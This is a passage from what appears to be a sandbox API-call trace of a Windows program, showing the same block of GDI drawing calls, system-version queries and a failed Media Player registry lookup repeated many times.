lppt=0x0) returned 0 [0087.608] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.608] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.608] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.608] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.608] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.608] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.608] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.608] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x2b0401d0 [0087.608] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x2d0401cd [0087.608] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040864 [0087.608] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040865 [0087.608] CombineRgn (hrgnDst=0x1040864, hrgnSrc1=0x2b0401d0, hrgnSrc2=0x2d0401cd, iMode=1) returned 1 [0087.608] CombineRgn (hrgnDst=0x1040865, hrgnSrc1=0x2b0401d0, hrgnSrc2=0x2d0401cd, iMode=4) returned 2 [0087.608] CreateSolidBrush (color=0xff) returned 0x2100863 [0087.608] CreateSolidBrush (color=0xff0000) returned 0x1100866 [0087.608] DeleteObject (ho=0x1100866) returned 1 [0087.608] DeleteObject (ho=0x2d0401cd) returned 1 [0087.608] DeleteObject (ho=0x2b0401d0) returned 1 [0087.608] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.608] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.608] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.608] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.608] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.608] BeginPath (hdc=0x0) returned 0 [0087.608] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.608] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.608] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.608] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.608] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.608] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.608] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.608] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.609] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x2e0401cd [0087.609] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x2c0401d0 [0087.609] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040867 [0087.609] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040868 [0087.609] CombineRgn (hrgnDst=0x1040867, hrgnSrc1=0x2e0401cd, hrgnSrc2=0x2c0401d0, iMode=1) returned 1 [0087.609] CombineRgn (hrgnDst=0x1040868, hrgnSrc1=0x2e0401cd, hrgnSrc2=0x2c0401d0, iMode=4) returned 2 [0087.609] CreateSolidBrush (color=0xff) returned 0x2100866 [0087.609] CreateSolidBrush (color=0xff0000) returned 0x1100869 [0087.609] DeleteObject (ho=0x1100869) returned 1 [0087.609] DeleteObject (ho=0x2c0401d0) returned 1 [0087.609] DeleteObject (ho=0x2e0401cd) returned 1 [0087.609] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.609] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.609] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.609] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.609] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.609] BeginPath (hdc=0x0) returned 0 [0087.609] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.609] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.609] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.609] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.609] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.609] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.609] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.609] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.609] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x2d0401d0 [0087.609] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x2f0401cd [0087.609] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104086a [0087.609] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104086b [0087.609] CombineRgn (hrgnDst=0x104086a, hrgnSrc1=0x2d0401d0, hrgnSrc2=0x2f0401cd, iMode=1) returned 1 [0087.609] CombineRgn (hrgnDst=0x104086b, hrgnSrc1=0x2d0401d0, hrgnSrc2=0x2f0401cd, iMode=4) returned 2 [0087.609] CreateSolidBrush (color=0xff) returned 0x2100869 [0087.609] CreateSolidBrush (color=0xff0000) returned 0x110086c [0087.609] DeleteObject (ho=0x110086c) returned 1 [0087.609] DeleteObject (ho=0x2f0401cd) returned 1 [0087.609] DeleteObject (ho=0x2d0401d0) returned 1 [0087.609] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.609] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.609] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.610] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.610] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.610] BeginPath (hdc=0x0) returned 0 [0087.610] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.610] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.610] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.610] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.610] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.610] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.610] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.610] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.610] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x300401cd [0087.610] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x2e0401d0 [0087.610] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104086d [0087.610] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104086e [0087.610] CombineRgn (hrgnDst=0x104086d, hrgnSrc1=0x300401cd, hrgnSrc2=0x2e0401d0, iMode=1) returned 1 [0087.610] CombineRgn (hrgnDst=0x104086e, hrgnSrc1=0x300401cd, hrgnSrc2=0x2e0401d0, iMode=4) returned 2 [0087.610] CreateSolidBrush (color=0xff) returned 0x210086c [0087.610] CreateSolidBrush (color=0xff0000) returned 0x110086f [0087.610] DeleteObject (ho=0x110086f) returned 1 [0087.610] DeleteObject (ho=0x2e0401d0) returned 1 [0087.610] DeleteObject (ho=0x300401cd) returned 1 [0087.610] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.610] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.610] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.610] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.610] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.610] BeginPath (hdc=0x0) returned 0 [0087.610] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.610] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.610] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.610] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.610] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.610] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.610] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.610] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.611] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x2f0401d0 [0087.611] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x310401cd [0087.611] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040870 [0087.611] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040871 [0087.611] CombineRgn (hrgnDst=0x1040870, hrgnSrc1=0x2f0401d0, hrgnSrc2=0x310401cd, iMode=1) returned 1 [0087.611] CombineRgn (hrgnDst=0x1040871, hrgnSrc1=0x2f0401d0, hrgnSrc2=0x310401cd, iMode=4) returned 2 [0087.611] CreateSolidBrush (color=0xff) returned 0x210086f [0087.611] CreateSolidBrush (color=0xff0000) returned 0x1100872 [0087.611] DeleteObject (ho=0x1100872) returned 1 [0087.611] DeleteObject (ho=0x310401cd) returned 1 [0087.611] DeleteObject (ho=0x2f0401d0) returned 1 [0087.611] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.611] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.611] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.611] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.611] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.611] BeginPath (hdc=0x0) returned 0 [0087.611] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.611] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.611] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.611] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.611] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.611] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.611] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.611] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.611] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x320401cd [0087.611] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x300401d0 [0087.611] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040873 [0087.611] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040874 [0087.611] CombineRgn (hrgnDst=0x1040873, hrgnSrc1=0x320401cd, hrgnSrc2=0x300401d0, iMode=1) returned 1 [0087.611] CombineRgn (hrgnDst=0x1040874, hrgnSrc1=0x320401cd, hrgnSrc2=0x300401d0, iMode=4) returned 2 [0087.611] CreateSolidBrush (color=0xff) returned 0x2100872 [0087.611] CreateSolidBrush (color=0xff0000) returned 0x1100875 [0087.611] DeleteObject (ho=0x1100875) returned 1 [0087.611] DeleteObject (ho=0x300401d0) returned 1 [0087.611] DeleteObject (ho=0x320401cd) returned 1 [0087.611] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.611] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.612] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.612] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.612] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.612] BeginPath (hdc=0x0) returned 0 [0087.612] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.612] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.612] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.612] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.612] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.612] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.612] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.612] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.612] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x310401d0 [0087.612] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x330401cd [0087.612] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040876 [0087.612] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040877 [0087.612] CombineRgn (hrgnDst=0x1040876, hrgnSrc1=0x310401d0, hrgnSrc2=0x330401cd, iMode=1) returned 1 [0087.612] CombineRgn (hrgnDst=0x1040877, hrgnSrc1=0x310401d0, hrgnSrc2=0x330401cd, iMode=4) returned 2 [0087.612] CreateSolidBrush (color=0xff) returned 0x2100875 [0087.612] CreateSolidBrush (color=0xff0000) returned 0x1100878 [0087.612] DeleteObject (ho=0x1100878) returned 1 [0087.612] DeleteObject (ho=0x330401cd) returned 1 [0087.612] DeleteObject (ho=0x310401d0) returned 1 [0087.612] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.612] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.612] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.612] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.612] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.612] BeginPath (hdc=0x0) returned 0 [0087.612] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.612] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.612] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.612] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.612] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.612] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.612] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.612] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.613] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x340401cd [0087.613] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x320401d0 [0087.613] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040879 [0087.613] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104087a [0087.613] CombineRgn (hrgnDst=0x1040879, hrgnSrc1=0x340401cd, hrgnSrc2=0x320401d0, iMode=1) returned 1 [0087.613] CombineRgn (hrgnDst=0x104087a, hrgnSrc1=0x340401cd, hrgnSrc2=0x320401d0, iMode=4) returned 2 [0087.613] CreateSolidBrush (color=0xff) returned 0x2100878 [0087.613] CreateSolidBrush (color=0xff0000) returned 0x110087b [0087.613] DeleteObject (ho=0x110087b) returned 1 [0087.613] DeleteObject (ho=0x320401d0) returned 1 [0087.613] DeleteObject (ho=0x340401cd) returned 1 [0087.613] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.613] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.613] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.613] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.613] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.613] BeginPath (hdc=0x0) returned 0 [0087.613] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.613] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.613] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.613] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.613] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.613] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.613] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.613] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.613] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x330401d0 [0087.613] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x350401cd [0087.613] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104087c [0087.613] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104087d [0087.613] CombineRgn (hrgnDst=0x104087c, hrgnSrc1=0x330401d0, hrgnSrc2=0x350401cd, iMode=1) returned 1 [0087.613] CombineRgn (hrgnDst=0x104087d, hrgnSrc1=0x330401d0, hrgnSrc2=0x350401cd, iMode=4) returned 2 [0087.613] CreateSolidBrush (color=0xff) returned 0x210087b [0087.613] CreateSolidBrush (color=0xff0000) returned 0x110087e [0087.613] DeleteObject (ho=0x110087e) returned 1 [0087.613] DeleteObject (ho=0x350401cd) returned 1 [0087.613] DeleteObject (ho=0x330401d0) returned 1 [0087.613] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.613] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.613] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.613] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.613] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.613] BeginPath (hdc=0x0) returned 0 [0087.614] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.614] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.614] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.614] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.614] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.614] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.614] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.614] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.614] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x360401cd [0087.614] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x340401d0 [0087.614] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104087f [0087.614] CreateRectRgn (x1=0, y1=0, x2=0, 